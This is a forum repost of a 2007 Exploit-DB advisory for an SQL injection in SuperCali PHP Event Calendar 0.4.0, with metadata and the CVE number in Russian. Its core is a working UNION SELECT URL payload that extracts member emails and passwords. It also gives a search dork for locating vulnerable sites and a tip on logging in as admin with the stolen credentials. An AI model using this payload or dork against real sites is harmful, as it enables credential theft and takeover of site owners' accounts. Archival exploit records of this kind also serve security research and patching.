Exploit SuperCali PHP Event Calendar 0.4.0 - SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
4141
Проверка EDB
  1. Пройдено
Автор
T0PP8UZZ
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2007-3582
Дата публикации
2007-07-03
Код:
--==+================================================================================+==--
--==+		    SuperCali Event Calendar SQL Injection Vulnerbility             +==--
--==+================================================================================+==--



AUTHOR: t0pP8uZz & xprog
SITE: http://supercali.inforest.com/
DORK: allintext:"SuperCali Event Calendar"


DESCRIPTION: 
Pull out members info from the database.


EXPLOITS:
http://www.server.com/index.php?o=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(email,0x3a,password),4,5,0x677269642E706870/**/from/**/users/*

NOTE/TIP: 
normally the first result is admin info, click the upper right link labeled 'manage calender'
to login as admin


GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net !


--==+================================================================================+==--
--==+		    SuperCali Event Calendar SQL Injection Vulnerbility             +==--
--==+================================================================================+==--

# milw0rm.com [2007-07-03]
 
Источник
www.exploit-db.com

Похожие темы